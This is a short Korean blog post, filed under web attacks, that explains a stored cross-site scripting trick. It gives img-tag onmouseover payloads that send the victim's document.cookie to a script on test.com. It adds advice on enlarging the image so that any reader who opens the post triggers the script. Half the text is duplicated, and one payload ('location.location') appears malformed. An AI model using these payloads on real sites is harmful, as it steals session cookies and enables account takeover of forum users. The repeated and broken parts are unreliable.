xss2- img src
웹/공격 2008. 12. 9. 14:59 |<img onmouseover="location.href='http://test.com/a.php?cookie='+document.cookie"></img>
이렇게 하면... http_referrer 값이 남지 않고
<img onmouseover="location.location='http://test.com/a.php?cookie='+document.cookie"></img>
이렇게 하면... http_referrer 값이 남는다.
본문에서 xss를 할 경우 src에 사진 파일의 크기를 엄청 나게 크게할 경우
victim이 게시글 제목을 클릭한 직후
사진파일의 크기가 커서 무조건 마우스 커서가 사진파일 위로 가기 때문에
글을 클릭할 경우 무조건 스크립트를 실행하게끔 할 수 있다.
이렇게 하면... http_referrer 값이 남지 않고
<img onmouseover="location.location='http://test.com/a.php?cookie='+document.cookie"></img>
이렇게 하면... http_referrer 값이 남는다.
본문에서 xss를 할 경우 src에 사진 파일의 크기를 엄청 나게 크게할 경우
victim이 게시글 제목을 클릭한 직후
사진파일의 크기가 커서 무조건 마우스 커서가 사진파일 위로 가기 때문에
글을 클릭할 경우 무조건 스크립트를 실행하게끔 할 수 있다.